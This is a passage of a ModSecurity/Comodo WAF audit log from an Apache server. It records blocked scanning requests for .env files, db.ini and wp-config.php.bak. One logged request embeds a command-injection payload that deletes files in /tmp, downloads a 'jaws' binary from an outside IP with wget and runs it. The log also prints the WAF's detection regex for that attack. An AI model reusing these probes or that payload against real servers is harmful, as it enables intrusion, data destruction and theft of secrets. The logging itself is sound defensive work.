"3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745083425137956 749 (- - -) Stopwatch2: 1745083425137956 749; combined=292, p1=256, p2=0, p3=0, p4=0, p5=35, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d4e550b-Z-- --8a0cc222-A-- [20/Apr/2025:00:23:45 +0700] aAPcIQ6cTFSgLAHl7PpSvAAAAAY 103.236.140.4 53294 103.236.140.4 8181 --8a0cc222-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.202 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.202 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --8a0cc222-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a0cc222-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745083425306698 650 (- - -) Stopwatch2: 1745083425306698 650; combined=276, p1=231, p2=0, p3=0, p4=0, p5=45, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a0cc222-Z-- --36f25840-A-- [20/Apr/2025:00:23:45 +0700] aAPcIUruoUXZj665VUF2zgAAANM 103.236.140.4 53296 103.236.140.4 8181 --36f25840-B-- GET /settings/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.202 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.202 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --36f25840-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36f25840-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745083425493933 712 (- - -) Stopwatch2: 1745083425493933 712; combined=260, p1=213, p2=0, p3=0, p4=0, p5=47, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36f25840-Z-- --e9b52b55-A-- [20/Apr/2025:00:23:46 +0700] aAPcIkruoUXZj665VUF20wAAAM8 103.236.140.4 53312 103.236.140.4 8181 --e9b52b55-B-- GET /db.ini HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.202 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.202 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --e9b52b55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9b52b55-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745083426666433 1601 (- - -) Stopwatch2: 1745083426666433 1601; combined=692, p1=297, p2=356, p3=0, p4=0, p5=39, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9b52b55-Z-- --a8c5bb4e-A-- [20/Apr/2025:00:23:48 +0700] aAPcJHNa4dA2HllpK_PrYQAAAI0 103.236.140.4 53344 103.236.140.4 8181 --a8c5bb4e-B-- GET /docker/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.202 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.202 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a8c5bb4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8c5bb4e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745083428948117 610 (- - -) Stopwatch2: 1745083428948117 610; combined=269, p1=246, p2=0, p3=0, p4=0, p5=22, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8c5bb4e-Z-- --712c864c-A-- [20/Apr/2025:00:36:00 +0700] aAPfAOvDiFC_ir7MDwZYcwAAAE0 103.236.140.4 60982 103.236.140.4 8181 --712c864c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36 Accept-Charset: utf-8 --712c864c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --712c864c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745084160882609 763 (- - -) Stopwatch2: 1745084160882609 763; combined=327, p1=286, p2=0, p3=0, p4=0, p5=40, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --712c864c-Z-- --db9bd134-A-- [20/Apr/2025:00:52:03 +0700] aAPiw0ruoUXZj665VUF8_QAAAMM 103.236.140.4 51348 103.236.140.4 8181 --db9bd134-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.59.160.222 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.59.160.222 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 Accept: */* --db9bd134-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db9bd134-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745085123204861 843 (- - -) Stopwatch2: 1745085123204861 843; combined=351, p1=308, p2=0, p3=0, p4=0, p5=43, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db9bd134-Z-- --222de964-A-- [20/Apr/2025:02:06:57 +0700] aAP0UevDiFC_ir7MDwZh6gAAAEY 103.236.140.4 41928 103.236.140.4 8181 --222de964-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.19 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.10 Safari/537.36 Edg/77.0.235.5 Accept-Charset: utf-8 --222de964-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --222de964-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745089617901802 750 (- - -) Stopwatch2: 1745089617901802 750; combined=297, p1=262, p2=0, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --222de964-Z-- --1a1e4529-A-- [20/Apr/2025:02:07:02 +0700] aAP0Vg6cTFSgLAHl7PpfQgAAAAc 103.236.140.4 41950 103.236.140.4 8181 --1a1e4529-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.19 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.19 X-Forwarded-Proto: http Connection: close User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14 Accept-Charset: utf-8 --1a1e4529-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a1e4529-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745089622898294 759 (- - -) Stopwatch2: 1745089622898294 759; combined=305, p1=266, p2=0, p3=0, p4=0, p5=38, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a1e4529-Z-- --fb37de3c-A-- [20/Apr/2025:02:51:59 +0700] aAP-33Na4dA2HllpK_P4NQAAAJc 103.236.140.4 52598 103.236.140.4 8181 --fb37de3c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.71.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.71.217 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --fb37de3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb37de3c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745092319247459 778 (- - -) Stopwatch2: 1745092319247459 778; combined=331, p1=273, p2=0, p3=0, p4=0, p5=58, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb37de3c-Z-- --ca9edd41-A-- [20/Apr/2025:03:42:32 +0700] aAQKuFu16wJWB6g0mU_wywAAABQ 103.236.140.4 36062 103.236.140.4 8181 --ca9edd41-B-- GET /shell?cd+/tmp;rm+-rf+*;wget+31.58.51.98/jaws;sh+/tmp/jaws HTTP/1.0 Host: 127.0.0.1 X-Real-IP: 183.250.254.92 X-Forwarded-Host: 127.0.0.1 X-Forwarded-Server: 127.0.0.1 X-Forwarded-For: 183.250.254.92 X-Forwarded-Proto: http Connection: close User-Agent: Hello, world Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 --ca9edd41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca9edd41-E-- --ca9edd41-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||127.0.0.1|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf *;wget 31.58.51.98/jaws;sh /tmp/jaws: cd/tmp rm -rf * wget 31.58.51.98/jaws sh/tmp/jaws"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745095352288224 3868 (- - -) Stopwatch2: 1745095352288224 3868; combined=1652, p1=795, p2=808, p3=0, p4=0, p5=49, sr=123, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca9edd41-Z-- --81248f65-A-- [20/Apr/2025:05:33:53 +0700] aAQk0Vu16wJWB6g0mU_4igAAAA0 103.236.140.4 37730 103.236.140.4 8181 --81248f65-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.251.69.35 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.251.69.35 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --81248f65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81248f65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745102033293030 871 (- - -) Stopwatch2: 1745102033293030 871; combined=382, p1=346, p2=0, p3=0, p4=0, p5=36, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81248f65-Z-- --80a86f47-A-- [20/Apr/2025:05:33:53 +0700] aAQk0Vu16wJWB6g0mU_4iwAAAA4 103.236.140.4 37736 103.236.140.4 8181 --80a86f47-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 196.251.69.35 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 196.251.69.35 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --80a86f47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80a86f47-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745102033942972 801 (- - -) Stopwatch2: 1745102033942972 801; combined=342, p1=307, p2=0, p3=0, p4=0, p5=35, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80a86f47-Z-- --52ceca2d-A-- [20/Apr/2025:06:36:45 +0700] aAQzjcTCDeBrh52UaHTP9wAAAI8 103.236.140.4 52382 103.236.140.4 8181 --52ceca2d-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 195.178.110.137 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 195.178.110.137 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --52ceca2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52ceca2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745105805838675 868 (- - -) Stopwatch2: 1745105805838675 868; combined=333, p1=284, p2=0, p3=0, p4=0, p5=49, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52ceca2d-Z-- --4d69b226-A-- [20/Apr/2025:07:08:30 +0700] aAQ6_kAzeWrUIk0gvAsucwAAAMs 103.236.140.4 48778 103.236.140.4 8181 --4d69b226-B-- GET /wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 65.109.55.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 65.109.55.146 X-Forwarded-Proto: http Connection: close Accept: */* --4d69b226-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d69b226-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745107710876301 1073 (- - -) Stopwatch2: 1745107710876301 1073; combined=280, p1=240, p2=0, p3=0, p4=0, p5=40, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d69b226-Z-- --1965c50a-A-- [20/Apr/2025:07:48:45 +0700] aAREbVu16wJWB6g0mU8mAwAAAAo 103.236.140.4 40198 103.236.140.4 8181 --1965c50a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36 Accept-Charset: utf-8 --1965c50a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1965c50a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745110125451322 991 (- - -) Stopwatch2: 1745110125451322 991; combined=479, p1=435, p2=0, p3=0, p4=0, p5=44, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1965c50a-Z-- --824fd01e-A-- [20/Apr/2025:08:23:20 +0700] aARMiFTf0pL9EQC7JDVB-QAAAFA 103.236.140.4 42018 103.236.140.4 8181 --824fd01e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.71.217 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.71.217 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --824fd01e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --824fd01e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745112200636642 756 (- - -) Stopwatch2: 1745112200636642 756; combined=308, p1=269, p2=0, p3=0, p4=0, p5=38, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --824fd01e-Z-- --5fcd6732-A-- [20/Apr/2025:09:04:27 +0700] aARWK8TCDeBrh52UaHT8SQAAAI0 103.236.140.4 54288 103.236.140.4 8181 --5fcd6732-B-- GET /.env.bak HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 103.59.160.222 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 103.59.160.222 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --5fcd6732-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fcd6732-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745114667384881 705 (- - -) Stopwatch2: 1745114667384881 705; combined=261, p1=227, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fcd6732-Z-- --61c91f36-A-- [20/Apr/2025:09:13:04 +0700] aARYMFTf0pL9EQC7JDVF_QAAAFI 103.236.140.4 56636 103.236.140.4 8181 --61c91f36-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 5.39.19.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 5.39.19.177 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --61c91f36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61c91f36-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745115184545974 811 (- - -) Stopwatch2: 1745115184545974 811; combined=368, p1=326, p2=0, p3=0, p4=0, p5=42, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61c91f36-Z-- --c2c4617f-A-- [20/Apr/2025:09:55:51 +0700] aARiN1Tf0pL9EQC7JDVIewAAAEY 103.236.140.4 38164 103.236.140.4 8181 --c2c4617f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.34 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; Lenovo K33a42) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36 Accept-Charset: utf-8 --c2c4617f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2c4617f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 